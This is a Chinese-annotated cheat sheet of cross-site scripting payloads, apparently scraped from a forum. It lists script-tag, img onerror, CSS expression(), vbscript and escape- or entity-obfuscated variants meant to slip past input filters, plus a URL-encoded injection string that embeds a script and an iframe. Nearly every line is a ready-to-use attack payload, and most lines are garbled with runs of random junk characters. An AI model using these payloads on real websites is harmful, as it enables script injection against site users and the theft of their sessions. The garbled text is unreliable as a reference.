<script>alert("跨站")</script> (最常用)3 z; U& v! Q; j% h# ]3 A n! b5 {7 u
<img scr=javascript:alert("跨站")></img>
$ Q5 J t" Z- P: h: X# Z7 U7 p; n<img scr="javascript: alert(/跨站/)></img>
0 @: Z* E! L8 h+ `2 h+ x<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
9 k- _7 Z0 f: B<img scr="#" onerror=alert(/跨站/)></img>
+ a. m* O2 a% j( u* d/ _" u<img scr="#" style="xss:expression(alert(/xss/));"></img>3 ]7 F+ }; j# ~8 Z5 K8 {- r
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)& j/ A% ?0 N* K& q
<img src=vbscript:msgbox ("xss")></img>" r( J, r# O& O! ?5 S: A0 `6 D, `+ \
<style> input {left:expression (alert('xss'))}</style>
# a: ~6 o1 X) s/ J<div style={left:expression (alert('xss'))}></div>
+ e5 a/ I8 a. L4 ?2 r# ]5 s<div style={left:exp/* */ression (alert('xss'))}></div>- Z0 h% r( J2 u" b4 G, V( F
<div style={left:\0065\0078ression (alert('xss'))}></div>) }; T) F, j, }4 w9 |2 R* v0 j0 K; w3 f
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>0 x* J' V9 P. v
unicode <div style="{left:expRessioN (alert('xss'))}">
1 R1 v/ A2 G+ @. B& c
; k# O& C! @, n+ [9 k"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["8 g' ~9 D% q2 F
|